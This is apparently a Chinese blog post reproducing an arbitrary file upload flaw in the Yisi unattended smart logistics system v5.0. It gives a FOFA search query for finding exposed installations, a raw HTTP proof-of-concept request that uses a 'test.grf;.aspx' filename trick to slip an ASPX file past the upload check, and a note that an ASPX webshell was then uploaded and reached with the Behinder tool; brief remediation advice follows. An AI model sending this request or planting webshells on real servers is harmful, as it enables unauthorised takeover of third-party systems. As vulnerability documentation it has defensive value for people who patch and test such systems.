• 漏洞复现-易思无人值守智能物流文件上传


    免责声明:

    文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

    一:漏洞描述

    易思无人值守智能物流系统/Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。

    二:漏洞影响版本

    v5.0

    三:网络空间测绘查询

    fofa:
    "易思无人值守智能物流"

    四:漏洞复现

    poc:

    1. Host: ip:port
    2. X-File-Name: test.grf
    3. User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    4. Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryxzUhGld6cusN3Alk
    5. Accept: */*
    6. Accept-Encoding: gzip, deflate
    7. Accept-Language: zh-CN,zh;q=0.9
    8. Connection: close
    9. Content-Length: 0
    10. ------WebKitFormBoundaryxzUhGld6cusN3Alk
    11. Content-Disposition: form-data; name="file"; .filename="test.grf;.aspx"
    12. Content-Type: application/octet-stream
    13. hello
    14. ------WebKitFormBoundaryxzUhGld6cusN3Alk--

    图片


     

    图片


     

    图片


    上传aspx马,冰蝎连接

    图片

    五:修复建议

    对上传文件的类型、大小、文件名等进行验证,确保只允许上传合法的文件类型,并限制文件大小和文件名的长度。可以使用白名单或黑名单的方式进行验证。

    及时关注和应用厂商发布的安全补丁和更新,修复已知的文件上传漏洞。

    原文地址: https://www.freebuf.com/articles/web/379832.html

                                                  学习更多渗透技能请看下方~

  • 相关阅读:
    分布式事务简介(seata)
    Codeforces Round #797 (Div. 3)个人题解
    go语言初学03 连接mysql
    Bash基本功能—输入输出重定向
    区块链技术的应用与前景展望
    CVPR 2022 Best Paper -- Learning to Solve Hard Minimal Problems
    2024年6月 青少年python一级等级考试真题试卷
    SpringBoot 如何优雅的进行全局异常处理?
    想要转行前端开发,却不知道如何选择靠谱的培训机构
    TCP三次握手,四次挥手状态转移过程
  • 原文地址:https://blog.csdn.net/hackzkaq/article/details/133858876